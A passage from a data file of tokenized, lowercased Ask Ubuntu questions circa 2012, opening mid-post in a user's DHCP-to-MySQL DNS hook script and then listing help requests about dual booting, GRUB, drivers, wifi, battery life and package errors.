% s to % s\n '' % ( clientip , hostname ) f.write ( s ) f.flush ( ) f.close ( ) db = mysqldb.connect ( host=mysql_host , user=mysql_user , passwd=mysql_pass , db=mysql_db ) cursor = db.cursor ( ) cursor.execute ( `` insert into records ( domain_id , name , type , content , ttl , prio , change_date ) values ( % s , % s , % s , % s , % s , % s , unix_timestamp ( now ( ) ) ) '' , [ 1 , hostname , '' a '' , clientip,3600,0 ] ) cursor.close ( ) db.commit ( ) db.close ( ) elif command == `` release '' : pp.pprint ( `` release '' ) f = open ( `` /tmp/leases '' , '' a '' ) s = `` released : % s from % \n '' % ( clientip , hostname ) f.write ( s ) f.flush ( ) f.close ( ) db = mysqldb.connect ( host=mysql_host , user=mysql_user , passwd=mysql_pass , db=mysql_db ) cursor = db.cursor ( ) cursor.execute ( `` delete from records where content = % s and name = % s '' , [ clientip , hostname ] ) db.commit ( ) db.close ( ) elif command == `` expiry '' : pp.pprint ( `` expiry '' ) f = open ( `` /tmp/leases '' , '' a '' ) s = `` expired : % s from % s\n '' % ( clientip , hostname ) f.write ( s ) f.flush ( ) f.close ( ) db = mysqldb.connect ( host=mysql_host , user=mysql_user , passwd=mysql_pass , db=mysql_db ) cursor = db.cursor ( ) cursor.execute ( `` delete from records where content = % s and name = % s '' , [ clientip , hostname ] ) db.commit ( ) db.close ( ) thank you mark hollander
224993	ubuntu 12.10 neither shuts down nor reboots properly	( hp dv6-6180eg , intel3000/ati 6770m ) although there have been several questions posted about this issue , i 'm still not able to find a solution . fyi , it 's not possible to toggle the screen brightness out of the box on my dv6 , so therefore i added those lines to my grub file : ( seen here ) grub_cmdline_linux_default= '' splash acpi_backlight=vendor '' grub_cmdline_linux= '' acpi_backlight=vendor '' i deleted them , and it worked ! but now i ca n't toggle my screen brightness anymore . therefore i tried this . it still does n't work . any solution ? thanks in advance !
224999	ubuntu wifi roaming problem : how do i set wireless sensitivity on ubuntu ?	i am having problem with wifi network that have multiple access points . ubuntu keeps roaming between access points because of high sensitivity . based on reading the manual for iwconfig , there is an option to set sensitivity like iwconfig wlan0 sens -80 . this keeps failing with operation not permitted . so i want to know if there is a way , to set the sensitivity of roaming in ubuntu .
225004	using vim as external editor using only one instance	i 'm playing a game that has a scripting language . it has a button to open the scripts in external editor . you can set the command that will trigger the editor from within the game 's interface . /usr/bin/x11/gvim opens the scripts in gvim now what i would like to know is , if it 's doable , to open the scripts in terminal 's vim and if instead of opening a new one each time to add tabs to the existing instance . what would be a command to do that ? the way of adding tabs is : tabe filename or from terminal for multiple documents vim -p file1 , file2 i guess there are more that i do n't know , i hope this is doable . thanks .
225006	media service on ubuntu	i have a ubuntu desktop on my home network which has a lot of files that i 'd like to play on my tv . i have a logitec reveue ( google tv ) which is capable of streaming media on the lan . so , i 'm looking for recommendation on applications that can start a media service on my lan ( like windows media center ) so that the google tv can play files from that server .
225009	how to get wifi not working on dell inspiron 15r 5520 notebook ?	issuing lspci -vnn gave me this ( relevant ) output : 08:00.0 network controller [ 0280 ] : broadcom corporation bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) i do n't know how to proceed in order to get it working . help on this is appreciated .
225011	can i install ubuntu with windows 8 ?	can i oops install ubuntu alongside windows 8 ?
225017	how do i change which audio jacks are used for input and output ?	i 'm using a realtek hd audio card built-in my motherboard . the windows driver comes with a control panel that allows me to select which back panel jacks are used for what . so for example i can make both the blue jack and green jack for output and only the red one for mic-in . ( whereas by default , the blue jack is for line in , which i never need . ) how can i do the same under linux ? if possible , please do n't suggest something that involves pulseaudio or jack ; i 'd like to do it the plain way , e.g . by editing alsa configuration files , if possible . the way i understand it , my problem should have nothing to do with software servers redirecting streams , just instructing the driver to treat this jack as so and so because it 's hardware supported . thank you very much !
225018	postgresql - configuring as upstart job problem	i need postgresql configured to start with the upstart system because i use upstarts events to start another app which depends on pgsql to be running . this is the tutorial/script i 've used : http : //bradleyayers.blogspot.com/2011/10/upstart-job-for-postgresql-91-on-ubuntu.html when i restart the server ( shutdown -r now ) , postgresql isnt running ( not visible as a job via 'top ' command ) . i then tried running only the following command manually : root @ server : ~ # exec su -c `` /usr/lib/postgresql/9.1/bin/postgres -d /var/lib/postgresql/9.1/main -c config_file=/etc/postgresql/9.1/main/postgresql.conf '' postgres and my ssh session simply disconects not returning anything . if i reconnect and again check running jobs , pgsql is still not running . so i tried running the command without 'exec ' and here is the response : root @ server : ~ # su -c `` /usr/lib/postgresql/9.1/bin/postgres -d /var/lib/postgresql/9.1/main -c config_file=/etc/postgresql/9.1/main/postgresql.conf '' postgres 2012-12-03 19:31:36 msk fatal : could not create lock file `` /var/run/postgresql/.s.pgsql.5432.lock '' : no such file or directory i assume the problem is related to postgresql itself not upstart system . i suppose the file it mentions should exist so it can be accessed but it does n't for some reason . did someone else stumble upon this , or has a potential solution to this ?
225027	ca n't mount data dvd using 12.04	i can not mount a data dvd using ubuntu 12.04 . i can read the dvd using a different os , so the dvd is not the problem . i can read other cds using ubuntu . the error i get is : $ sudo mount /dev/dvd /cdrom mount : no medium found on /dev/sr0 the relevant output from lshw is : *-cdrom description : dvd reader product : dvd/cdrw ujda775 vendor : matshita physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/sr0 version : cb03 capabilities : removable audio cd-r cd-rw dvd configuration : ansiversion=5 status=nodisc i have installed ubuntu-restricted-extras and run /usr/share/doc/libdvdread4/install-css.sh .
225028	dual boot windows 8 with ubuntu 12.10	this is my first time so please help/ steps i followed : install windows 8 pro with media centre on my asus k55vm , i7 ,8gb . windows boots fine and is in perfect condition . booted into ubuntu live usb and installed ( it detected windows , installed alongside windows 8 with recommended setting ) installed perfectly . rebooted , but no option to select ubuntu , just loads into windows 8 without any option , tried boot repair and no use . please help , tried many tutorials to no use , heard about easybcd also , any help ?
225032	grub prompt at boot after boot-repair	i tried installing ubuntu 12.04 from the live cd . the install went fine but i had the next error while booting : grub stage 1.5 error 2 . so i used boot-repair as explained here . still not working , i got this while booting : gnu grub version 1.99-21ubuntu3 minimal bash-like line editing is supported . etc.. nothing more . here the report from boot-repair . could anyone help me ?
225034	how to hide files with certain extensions ?	i have plenty of files in a folder with extension of .dep , i want to hide these files . but i do n't want to change their names such as adding a dot ahead of them . what would be the best way to do this ? thanks !
225035	what is causing unity to be slow on startup ?	a few days ago i noticed that after i login in , the top panel and the dash took a bit more time to load and i noticed more disc activity than usual . i thought that it might have been caused by some update or by the installation of pdftk . so i removed pdftk but the `` problem '' persists . is there a way to know what is using the disc ( read/write operations ) on startup ? if it were at a later time , i would use iotop but i can only launch iotop after i get control of the desktop . i 'm on ubuntu 12.10 amd64 . edit i took a look at the logs and in the xorg.0.log file i found the following lines : [ 36.230 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-ed81635d9dabcaa502951b920776fb5895d92dc0.xkm [ 6683.340 ] ( ii ) xkb : generating xkmfile /var/lib/xkb/server-7111f82c412662d491d0f0a3a5a74c8f62b59f29.xkm could this be the problematic step ?
225046	can installing ubuntu 12.10 on its own partition affect my windows 7 partition ?	here is the scenario i have already downloaded the ubuntu 12.10 desktop 32bit on ubuntu site . now i want to put it in my 4gb flash drive using the universal installer . assuming i have a 100gb hard drive , i want to use 30gb for ubuntu . ( is 30gb ok for the ubuntu partition or should i put a little higher , like 50gb ? ) so there will be 70gb partition of my windows7 home premium 64bit so 100gb= 30gb ubuntu + 70gb windows i will use windows 7 disk management to cut off 30gb before installing . i 'm not sure if using this disk partitioning method can totally cut the disk partitioning away from windows . ( if theres another method to totally take away a disk partition please do recommend it ) 'for me to sure that it will not affect the original os . ' i 'm actually very new to ubuntu . so explain it detail by detail . the laptop that i will install ubuntu in is not mine . i will use this os for our thesis project so please advise me . i also have 'wubi.exe ' but i 'm not comfortable using it .
225048	is wubi for windows 8 ?	my dell laptop shipped with windows 8 . i installed ubuntu 12.10 ( 64 bit ) through wubi installer , the installer worked fine till the reboot demanding screen . but after the reboot , my laptop boots to a black screen with the problem stated : '' file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains errors. `` i checked for the specified path in my c drive ( windows 8 ) and i found the file there . now , whats the problem . is it the compatibility of wubi with windows 8 or something else ? ? could anyone help
225049	ca n't disable alt + mouse buttons combinations	i 've already searched through the questions , and did n't find the same question as i want to ask . i 'm working in blender and there are some combinations that i am used to and remapping them in blender would be the last resort , not the first . i have tried to disable alt+lmb and alt+rmb actions in ccsm , i 've tried to do this in dconf or gconf editors as well , but nothing helped . as soon as i close the editors or get back to the main screen of ccsm , these combinations are enabled again . so , for example , instead of selecting an edge loop in blender with alt+rmb , i get this goddamn menu offering me to move the window to another workspace , etc . i really do n't need this function , so i 'd rather switch it off instead of remapping the hotkeys i 'm used to in blender .
225050	how can i manage ppa if i only have terminal access through ssh ?	this would work if i had direct access to the server : is there a tool to update my ppa sources.list entries after upgrading ? but which are the underlying commands this tool uses ?
225052	shortcut to change the search engine in firefox	ctrl + k and ctrl + j takes me to the search field , but how can i change the search engine ( say from stack overflow to ask ubuntu ) using the keyboard ?
225054	ubunbtu 12.10 and acer aspire 5315 overheat/fan problem	i know this question has been asked and answered before , but the solutions do not seem to be relevant for 12.10 . the acer_fancontrol script is out of date , directories are not the same anymore and acer aspires are coming out with more ram than 512mb . what is the fix in 12.10 ?
225055	unable to `` rm '' a file named `` ( ) - . '' due to `` no such file or directory ''	a script i wrote named a file `` ( ) - . '' according to filezilla . filezilla was unable to delete it from the server so i tried to `` rm `` ( ) - . '' from inside the containing folder and received `` rm : can not remove ` ( ) - . ' : no such file or directory '' . i then used `` ls '' which shows ... ( ) - . 03_the_kill_30_seconds_to_mars.mp3 crooked x ( crooked x ) - 08 nightmare.mp3 01 attack - 30 seconds to mars.mp3 03 wave of mutilation - pixies.mp3 danzig ( danzig ) - 01 twist of cain.mp3 it lists the file in question though here it looks like it might contain a leading space and mabey two spaces between the `` - '' and the `` . '' . so i tried to `` rm '' many combinations of spaces mixed between the other characters with no success . i also tried renaming it but with the same error . my fallback is to replace it with a 0kb file of the same name but , i 'd rather delete it , ( read- i 'm ocd and it 's irritating me that it shows up in `` ls '' ) thanks for any help . running : ubuntu 12.04 lts server edition
225062	ubuntu 10.04.4 is asking for username and password during the instalation . why ?	iâ´m a beginner on ubuntu and i tried to install the program on my computer in the same disk with winxp already installed . the program were downloaded from the ubuntu site and the image recorded in a cd . please , tell me what username and password i need to use to install it .
225063	which command is issued when i choose `` shutdown ... '' ?	i have noticed that some of my machines do not switch off ( since the upgrade to precise ) when i choose `` shutdown ... '' from the menu in the upper right corner of unity . if the system is powered down or not is a kind of random . however , whenever i use the terminal to sudo shutdown -h now it will switch off the machine reliably . after having read this answer , i wonder what command unity issues to initiate the shutdown ( and power off ) of the system ?
225072	help with using the unity web api for my website	i 'm trying to follow this tutorial , but when clicking on the 'executing this now ' on that site nothing happens , i have put up this code here press ( ctrl+u ) to see the code and that does n't work either . facebook , youtube and others websites work , so why does n't that tutorial work ?
225073	move wubi installation of ubuntu to a different partition in windows	i do n't have a lot of space on my d : drive and ubuntu is taking 15 gigs of it so i wonder , is there a way of moving ubuntu from d : to c : while keeping the files that exists on ubuntu ? thanks
225078	how to reactivate grub	have a computer with two ubuntu versions on it in separate partitions . for the fun of it , i installed winxp home in a thrird partition . i then deleted winxp but now i do n't get the grub boot menu . is there a way to get the grub boot menu back without reinstalling one of the ubuntu versions already on the hard drive ?
225080	deleting recovery partition on dual boot machine and resizing window 7 partition	i am using a dual boot ubuntu/win7 machine . my win 7recovery partition is around 20gb , since i have created recovery disks i am assuming i no longer need it my windows partition is only small i was thinking to delete the recovery and add an extra 20gb to my win . is my thinking sensible there ? . the recovery partition shows as the 1st partition on my hard disc . i 'm a bit concerned that by moving the starting position of my win partition to the start of the hard disc i will make win 7 'lost ' and unable to boot . i am fairly new to ubuntu and have n't used a dual boot machine before . i know i use grub 2 to boot either windows or ubuntu but i ca n't remember if i 'loose ' the win7 partition and use the recovery disks wether mbr will then overwrite grub . i 'm basically concerned it could become very messy and just looking for some advice as the best way to go about it . any ideas , in n00b language ?
225085	how to move window buttons from left to right side of title bar in gnome classic ?	how to move the window buttons ( close , minimise , maximise ) from the left side of the title bar to the right side in gnome classic 12.10 ? gconf-editor ( apps > metacity etc ) does n't work . nor does dconf-editor nor does gnome tweak tool .
225090	the system is running in low-graphics mode error in `` virtualbox ''	i faced a `` the system is running in low-graphics mode error '' like the on in this question how to fix `` the system is running in low-graphics mode '' error ? this happened in virtualbox ! i 'll go with the answer that the root file system ran out of space since i left the system downloading some stuff & previously i was notified that the system is low on space . dumb of me but everyone makes mistakes . i was planning on moving the files to a shared folder later on . the screen i get is similar to the screen in the link above . if i click on ok , i get the following screen none of the options work . i even tried to use the shell mode to try to free some space but all i get is this screen so my question is how can i get back to my system & move the files to the shared folder ( which btw needs guest additions which is was already installed on the system ! ) or better ( if easier ) an usb ? note : i tried a live mode ( iso ) but i can not do anything ( e. g ; open nautilus or a terminal ! ) ; + i get a verp_pdm_media_locked_error when try to install guest additions .
225093	emacs gives warnings in lubuntu	i am running lubuntu-desktop ( quantal quetzal ) which i installed after having started with the standard ubuntu install . it all works fine but when i run an application from the command line i get warnings in the terminal . for example emacs gives me ** ( emacs:25391 ) : warning ** : invalid borders specified for theme pixmap : /usr/share/themes/lubuntu-default/gtk-2.0/images/null.png , borders do n't fit within the image ** ( emacs:25391 ) : warning ** : invalid borders specified for theme pixmap : /usr/share/themes/lubuntu-default/gtk-2.0/images/scrollbar_vertical.png , borders do n't fit within the image is there a way to stop this or is there another way to run emacs that works better for lubuntu-desktop ?
225094	my password is in a configuration file . how do i prevent read access to other users on the system ?	i am trying to use ssmtp as my command line mail application as proposed in this answer . one of the steps is to put my mail account password in a file /etc/ssmtp/ssmtp.conf . since the file has read permission for all users , it undermines the secrecy of my password . how to overcome this ? i tried to remove the read permission for group and others but then ssmtp does not work anymore .
225096	help with xbox gamepad and wine	i installed my xbox gamepad with `` xboxdrv_0.8.2-1_amd64.deb '' and the controller works just fine with linux games such as open arena . the difficulty i am haveing is when i play doom64 ex in wine , my gamepad is not detected . doom 64 ex detects my gamepad in windows , so its not my version of doom . i hope some one could point me in the right direction to get this to work .
225098	update manger in 11.10 does not show ubuntu 12.04 as available for update	i have ubuntu 11.10 . when i go to update manager it does not show 12.04 as available to upgrade system . in settings there is no way fro
225101	mysql show databases not showing databases that are in /opt/bitnami/mysql/data directory	and thank you for taking the time to look at my question . i have an ebs-backed ec2 ubuntu server which is running but unreachable . ** there are very stupidly no recent backups ** i made a snapshot of the block , created a volume , spun up a new instance , attached the new volume . i see all the data from my site in the /opt/bitnami/mysql/data directory , but when i go into the mysql console , it shows only information_schema and test when i type show databases ; how can i 'point ' mysql to the correct folder ? thank you !
225103	freeze/lag issues with minecraft on 12.10	i 've been running minecraft on ubuntu for a couple days but i am often encountering the same problem . i started playing from the browser but after about 15 minutes it would freeze or lag so bad that i could not continue . i then learned to launch it from command line and continued to have the same problem . with the command line still open it gave me this warning : '' warning : ca n't keep up ! did the system time change , or is the server overloaded ? '' figuring it may be a memory allocation issue , as was mentioned in another question , i tried the launch script provided in the answers there , which was java -xmx2096m -xms1048m -cp minecraft.jar net.minecraft.launcherframe this did not solve my problem , the warning is still occurring and i even had a little more trouble getting it to open with this one.this computer has run minecraft before , when it had windows , so i think the machine itself is powerful enough to do it . oh , and i 'm running open jdk 7 for java . suggestions on how i can get this up and running for longer than 15 minutes ?
225105	modprobe loads nvidia driver but xorg.conf has errors	i recently upgraded to 12.10 . in the process , my laptop , which is a w520 in a dock , connected to 2 external monitors ( the same monitors.. dell u2400 ) . i finally got the nvidia-experimental-310 driver working with both monitors . everything was glorious for a few weeks , and then the thing decided to upgrade the kernel and i did n't realize it did that when i asked it to do the apt-get upgrade . after realizing my mistake , i went back and tried reinstalling the nvidia driver , since i assumed it needed to be built against the current kernel again . i could n't get either the nvidia-current or nvidia-experimental-310 drivers working ( they booted into a black screen with a flashing cursor , or , in the case of the 310 driver , would n't let me enable my second screen ) . i was able to get the nvidia-experimental-304 driver working , though . so , after some trial and error , i updated my xorg.conf file and rebooted . now , however , i get the following error in my xorg.0.log file : [ 16.023 ] ( ee ) failed to load module `` nvidia-experimental-304 '' ( module does not exist , 0 ) but , when i go to a virtual terminal , and run the following : # modprobe nvidia-experimental-304 # /etc/init.d/lightdm restart everything now works as expected , except that the following still shows up in my xorg.0.log file , even when x starts as i would expect it to : [ 16.023 ] ( ee ) failed to load module `` nvidia-experimental-304 '' ( module does not exist , 0 ) can anyone tell me what i 'm doing incorrectly ? i 'd like to get the module to automatically load on startup , so i can boot into x directly , without having to manually modprobe the module . my xorg.conf file follows . edit if i change the driver `` nvidia-experimental-304 '' to `` nvidia '' in my xorg.conf file , the system runs in low-graphics mode on reboot , with the following errors in the xorg.conf file : [ 17.147 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 17.163 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the [ 17.163 ] ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and [ 17.163 ] ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . [ 17.163 ] ( ee ) nvidia ( 0 ) : *** aborting *** [ 17.163 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 syslog now shows : dec 3 12:55:03 corellia kernel : [ 33.405620 ] e1000e 0000:00:19.0 : irq 50 for msi/msi-x dec 3 12:55:03 corellia kernel : [ 33.431116 ] nvidia : module license 'nvidia ' taints kernel . dec 3 12:55:03 corellia kernel : [ 33.431118 ] disabling lock debugging due to kernel taint # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 304.64 ( buildd @ papaya ) fri nov 9 10:49:08 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell u2410 '' horizsync 30.0 - 81.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia-experimental-304 '' vendorname `` nvidia corporation '' boardname `` quadro 1000m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-5 '' option `` metamodes '' `` dfp-5 : nvidia-auto-select +1920+0 , dfp-6 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
225107	how to make ubuntu understand a windows-style folder path as a folder on windows partition ?	i have ubuntu and win7 on dual boot . on windows , a use a program that is set to save things on a given windows folder ( like `` d : \some folder '' ) . on ubuntu , i can run this exact same program ( it 's not a linux version of the program , it 's really the same program located on my windows partition that i can run from ubuntu ) . my problem is that when i run it on ubuntu , the program ca n't save things because it 's set to save on `` d : \some folder '' , which ubuntu does n't recognize as a valid path . this folder 's path on ubuntu is `` /media/d/some folder '' is there a way to make ubuntu understand `` d : \some folder '' as a synonym/alias of `` /media/d/some folder '' so that when i use this program on ubuntu it 's able to save things in the same folder as it does when run on windows ? it 's really bothersome to have to change the path every time i run this program on the other os .
225108	what about life battery in ubuntu 12.04.1	i have a basic notebook samsung rv513 with ati vision amd graphics & chipset but i realized than ubuntu 12.04.1 drains my battery . i checked some forums and help but it said modifying my kernel and bla bla , looks hard to do any other suggestion ?
225112	dual boot with ubuntu and windows 7	i looked at the questions regarding dual-booting with win 7 and ubuntu 12.10 and could n't locate an answer . can i simply install ubuntu to a free partition and it will automatically ask me each time i reboot which os i would like to use ?
225113	problem installing kde in 12.04	after a sudo apt-get update & & sudo apt-get upgrade and putting the command sudo apt-get install kubuntu-desktop in the terminal to install kde i get this : the following packages have unmet dependencies : kubuntu-desktop : depends : kde-workspace but not to be installed depends : okular but it will not install depends : plasma-desktop but it will not install depends : plasma-netbook but not to be installed depends : software-properties-kde but it will not install recommends : akonadi-facebook but it will not install recommends : akregator but not to be installed recommends : apport-kde but it will not install recommends : apturl-kde but it will not install recommends : jockey-kde but it will not install recommends : kaddressbook but not to be installed recommends : kde-config-touchpad but not to be installed recommends : kdepim-kresources but not to be installed recommends : kdepim-runtime but it will not install recommends : kdepim-strigi-plugins but it will not install recommends : kmail but not to be installed recommends : knotes but not to be installed recommends : kontact but not to be installed recommends : korganizer but not to be installed recommends : kubuntu-notification-helper but not to be installed recommends : muon but not to be installed recommends : muon-installer but it will not install recommends : muon-notifier installed but will not recommends : plasma-widget-facebook but it will not install recommends : plasma-widgets-addons installed but will not recommends : usb-creator-kde but it will not install recommends : userconfig but not to be installed e : failed to correct problems , you have held broken packages . what can i do to fix it ? thank you !
225114	assign sounds to system events like windows	can sound files be assigned to system events in ubuntu 12.04 ? in win , i could play .wav files at startup , shutdown , new mail , exclamation , etc . i read somewhere about ubuntu-tweak & installed , it , without realizing it only works with gnome desktop . is there a similar program for unity desktop ? there are similar questions posted here , but they are unanswered
225118	xubuntu running incredibly slowly on a relatively sufficient system - how to find the cause ?	i recently formatted my hard-disk and installed xubuntu 12 on my desktop pc , which has the following specifications : intel p4 3ghz 1.5gb ram 80gb hard-disk 128mb nvidia video card ( fx5500 ) in short , system performance is incredibly poor . for example , scrolling on web pages can become unbearably slow . it is usually ok immediately after booting -- the slowdown becomes worse as it continues to be used . i initially thought it was to do with my video drivers , but changing from the nouveau drivers to the proprietary ones did not seem to make any difference . ideally i would like to learn about methods that could be used to diagnose what may be causing the issues on my system . it would seem like a waste to purchase a new system when this current one should be capable of running xubuntu like a dream ! lsb_release -d description : ubuntu 12.10 -- - df -h filesystem size used avail use % mounted on /dev/sda1 72g 3.2g 66g 5 % / udev 748m 4.0k 748m 1 % /dev tmpfs 302m 760k 302m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 755m 500k 755m 1 % /run/shm none 100m 8.0k 100m 1 % /run/user -- - free -m total used free shared buffers cached mem : 1509 1408 101 0 68 784 -/+ buffers/cache : 555 954 swap : 1534 0 1534 -- - top -n 2 top - 21:03:37 up 2:30 , 2 users , load average : 1.74 , 0.54 , 0.32 tasks : 126 total , 4 running , 122 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 77.7 us , 9.3 sy , 0.0 ni , 12.3 id , 0.0 wa , 0.0 hi , 0.7 si , 0.0 st kib mem : 1546176 total , 1271916 used , 274260 free , 69620 buffers kib swap : 1571836 total , 0 used , 1571836 free , 717172 cached pid user pr ni virt res shr s % cpu % mem time+ command 1891 mik 20 0 659m 229m 27m r 119.8 15.2 32:25.16 plugin-containe 1206 root 20 0 100m 43m 16m r 25.8 2.9 10:44.32 xorg 1662 mik 20 0 447m 109m 33m s 21.2 7.2 7:34.04 firefox 1444 mik 9 -11 161m 5552 4124 r 6.6 0.4 7:11.30 pulseaudio 1383 mik 20 0 27852 10m 8368 s 1.0 0.7 0:48.35 xfwm4 3407 mik 20 0 5220 1392 1004 r 0.7 0.1 0:00.03 top 3266 mik 20 0 10176 1576 856 s 0.3 0.1 0:00.01 sshd 1 root 20 0 3620 1936 1248 s 0.0 0.1 0:00.96 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.36 ksoftirqd/0 6 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/0 7 root rt 0 0 0 0 s 0.0 0.0 0:00.03 watchdog/0 8 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/1 9 root 20 0 0 0 0 s 0.0 0.0 0:00.04 kworker/1:0 10 root 20 0 0 0 0 s 0.0 0.0 0:00.36 ksoftirqd/1 11 root rt 0 0 0 0 s 0.0 0.0 0:00.03 watchdog/1 12 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 cpuset 13 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 khelper 14 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kdevtmpfs 15 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 netns 16 root 20 0 0 0 0 s 0.0 0.0 0:00.35 kworker/u:1 17 root 20 0 0 0 0 s 0.0 0.0 0:00.02 sync_supers 18 root 20 0 0 0 0 s 0.0 0.0 0:00.00 bdi-default 19 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kintegrityd 20 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kblockd 21 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 ata_sff 22 root 20 0 0 0 0 s 0.0 0.0 0:00.01 khubd 23 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 md 25 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khungtaskd 26 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kswapd0 27 root 25 5 0 0 0 s 0.0 0.0 0:00.00 ksmd 28 root 39 19 0 0 0 s 0.0 0.0 0:00.00 khugepaged 29 root 20 0 0 0 0 s 0.0 0.0 0:00.00 fsnotify_mark 30 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ecryptfs-kthrea 31 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 crypto 40 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kthrotld 42 root 20 0 0 0 0 s 0.0 0.0 0:00.00 scsi_eh_0 43 root 20 0 0 0 0 s 0.0 0.0 0:00.00 scsi_eh_1 44 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kworker/u:3 other info : full screen video is incredible slow . unwatchable framerates .
225119	cloned ubuntu to ssd , how to get grub recognize it ?	using gparted from a liveusb i copied ubuntu system to a new disk . i gave it a new uuid and edited the grub.cfg and fstab on the clone to change all references to the old uuid ( and /dev/sdz ) to the new one . the old hard drive has windows on it and i 'm quite happy leaving it as the boot disk and keeping the old ubuntu system bootable as well . but how can i get grub to recognize the cloned system on the new disk and boot it preferentially ?
225121	after system update , screen size very small	please help ! i am pretty `` newb '' to linux and have no idea what to do . i got the message `` your system must reboot to complete updates '' ( or similar ) . after rebooting i am greeted with a giant login screen and my 2nd monitor is n't showing anymore . after logging in , i can only see a part of my desktop -- one giant folder icon . i can right click on the desktop but gives me no option to change resolution or anything . any help would be wonderful . ps : i am able to get a terminal window open . luckily that one folder had a terminal shortcut i had put there . so if this can help troubleshoot , please advise . edit 2 : this got me back to unity working and a nice resolution and both monitors : apt-get purge nvidia-current rm /etc/x11/xorg.conf reboot now unfortunately , now i guess i do n't have any hw accel for my graphics card ? : (
225122	syntax error on python 2.7.3	i am trying to perform a qstk related task on python2.7.3 but ending up with syntax error [ python 2.7.3 ( default , sep 26 2012 , 21:51:14 ) [ gcc 4.7.2 ] on linux2 type `` copyright '' , `` credits '' or `` license ( ) '' for more information . > > > python tutorial1.py syntaxerror : invalid syntax > > > ] , i went through a whole tutorial to setup python & other prerequisite softwares , everything got installed perfectly except for the following @ ubuntu : ~ $ sudo apt-get build-dep python-cvxopt reading package lists ... done building dependency tree reading state information ... done e : you must put some 'source ' uris in your sources.list is this installation incomplete ? is the problem on python related to this incomplete installation ? how can i sort out this installation & syntax error problem ?
225124	ubuntu does not start from cd	installed 11.10 , i tried to start 12.04 from cd but just got the purple screen with color changing dots and then name ubuntu . cd drive control led shows 2 seconds with 5 seconds pause ... drive constantly starts and stops . and , by the way , the hard disk led indicates some data transfer , what , as far as i understand should not happen while starting ubuntu from cd
225126	how to improve battery life on a hp pavilion dv6 ?	i 've installed ubuntu 12.10 a few days ago and i have only been able to get up to one hour of battery life . when running windows 7 i get up to 3-4 hours . my screen is ultra bright , even though the screen brightness is set to the minimum ( i installed xcalib to dim my screen , but it does n't improve the battery life ) i read about jupiter and installed it , but it does n't have a noticeable effect .
225129	ubuntu 12.04 - no internet connection	i 've recently installed ubuntu 12.04 on an old dell pc , which i 'm using as media center . i have an ethernet cable plugged in from the pc directly to the router . there 's nothing wrong with the network card as its i can access the pc from my laptop using chicken vnc . my ifconfig looks like this : eth0 link encap : ethernet hwaddr 00:0f:1f:59 : b1:5e inet addr:192.168.1.21 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :20f:1fff : fe59 : b15e/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:15360 errors:0 dropped:0 overruns:0 frame:0 tx packets:19712 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1640979 ( 1.6 mb ) tx bytes:17863489 ( 17.8 mb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:8534 errors:0 dropped:0 overruns:0 frame:0 tx packets:8534 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:664924 ( 664.9 kb ) tx bytes:664924 ( 664.9 kb ) any help appreciated . regards , stephen
225134	can not connect to the internet after installing cisco anyconnect vpn client	today , i tried to install the cisco anyconnect vpn client on my computer running ubuntu 12.04 updatet earlier today . i followed the instructions on this webpage https : //innsida.ntnu.no/wiki/-/wiki/english/install+vpn , but after i had typed in my username and password , it failed to connect and my computer was no longer able to connect to the internet . it finds my router with no problems and it pings my dns server as normal , but it times out when i try to ping www.google.com for example . i realize that more information is probably necessary for anyone to help me , but i do n't know much about networking . best regards
